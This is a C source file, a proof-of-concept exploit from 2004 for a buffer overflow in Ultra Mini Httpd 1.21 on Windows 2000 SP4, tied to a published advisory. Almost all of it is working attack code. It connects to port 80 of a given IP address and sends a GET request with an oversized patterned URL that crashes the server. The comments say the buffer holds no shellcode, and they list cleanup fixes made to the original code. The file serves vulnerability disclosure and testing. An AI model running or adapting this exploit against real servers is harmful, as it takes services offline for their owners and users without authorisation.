//**************************************************************************
// Ultra Mini Httpd Server Buffer Overflow Vulnerability
// Proof-of-concept Exploit for English Win2K SP4
// 29 Jul 2004
//
// Ultra Mini Httpd is an HTTP server released by Dip.PicoLix for Windows
// platforms.  It is small, easy to configure, and supports CGI.  Ultra
// Mini Httpd version 1.21 has a buffer overflow vulnerability that may
// be exploited to crash the server or to execute arbitrary code.
//
// The vulnerability is triggered by sending an HTTP request with an
// abnormally long URL.
//
// This POC code will crash a vulnerable Ultra Mini Httpd server.
//
// Advisory 
// http://www.security.org.sg/vuln/minihttpd121.html
//
// Greetz: snooq, sk, and all guys at SIG^2 (www.security.org.sg)
//
//**************************************************************************

#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32.lib")


// The single request this PoC sends (see the advisory link in the header):
// a GET whose URL is abnormally long, followed by the blank line that ends
// the header block.  Per the header comment it is the URL length that
// triggers the server-side overflow; the body is printable ASCII only, so
// this buffer can only crash the service -- it carries no code.
// main() sizes the send() with strlen() on this buffer, so it must remain
// NUL-free and NUL-terminated (the string literal supplies the terminator).
unsigned char expBuf[] = 
"GET "
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"BAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"CAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"DAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"EAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"FAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"GAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXX3YYYYZZZZ"
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"BAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"CAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"DAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"EAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"FAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"GAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXX3YYYYZZZZ"
"\r\n\r\n";


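// Entry point: connects to TCP port 80 of the IPv4 address given as the
// only argument and sends expBuf once.
//
// Fixes relative to the original:
//  - the (sockaddr *) cast was C++ syntax; C needs (struct sockaddr *)
//  - WSASocket() and inet_addr() results were never checked
//  - a failed send() returned without closesocket()/WSACleanup()
//  - a failed connect() exited with status 0; it now exits with 1
//
// Returns 0 when the request was sent, 1 on any usage, Winsock, address,
// socket, connect or send error.
int main(int argc, char* argv[])
{
	WORD wVersionRequested;
	WSADATA wsaData;
	struct sockaddr_in sin;
	SOCKET s;
	int err;
	int rc = 1;	// pessimistic: only the full success path clears it

	if(argc != 2)
	{
		printf("Usage: %s <ip addr>\n", argv[0]);
		return 1;
	}

	wVersionRequested = MAKEWORD(2,0);
	err = WSAStartup(wVersionRequested, &wsaData);
	if(err != 0)
	{
		printf("\nWSAStartup Error.\n");
		return 1;	// nothing to clean up: WSAStartup failed
	}

	if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0)
	{
		printf("\nWinsock Version Error\n");
		WSACleanup();
		return 1;
	}

	// inet_addr() accepts dotted-decimal IPv4 only; INADDR_NONE signals
	// an unparsable string (it is also 255.255.255.255, which is never a
	// valid unicast target here).
	memset(&sin, 0, sizeof(sin));
	sin.sin_addr.s_addr = inet_addr(argv[1]);
	if(sin.sin_addr.s_addr == INADDR_NONE)
	{
		printf("Invalid IP address: %s\n", argv[1]);
		goto out_cleanup;
	}
	sin.sin_family = AF_INET;
	sin.sin_port = htons(80);

	s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
	if(s == INVALID_SOCKET)
	{
		printf("Cannot create socket (error %d)\n", WSAGetLastError());
		goto out_cleanup;
	}

	if(connect(s, (struct sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
	{
		printf("Cannot connect to server!\n");
		goto out_close;
	}

	// expBuf is a NUL-terminated string literal, so strlen() gives the
	// exact number of bytes to send; send() takes an int length.
	if(send(s, (const char *)expBuf, (int)strlen((const char *)expBuf), 0) == SOCKET_ERROR)
	{
		printf("Error sending exploit!\n");
		goto out_close;
	}
	printf("Exploit Sent.\n");
	// Kept from the original; presumably gives the server time to read
	// the request before the socket is closed -- TODO confirm.
	Sleep(2000);
	rc = 0;

out_close:
	closesocket(s);
out_cleanup:
	WSACleanup();
	return rc;
}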

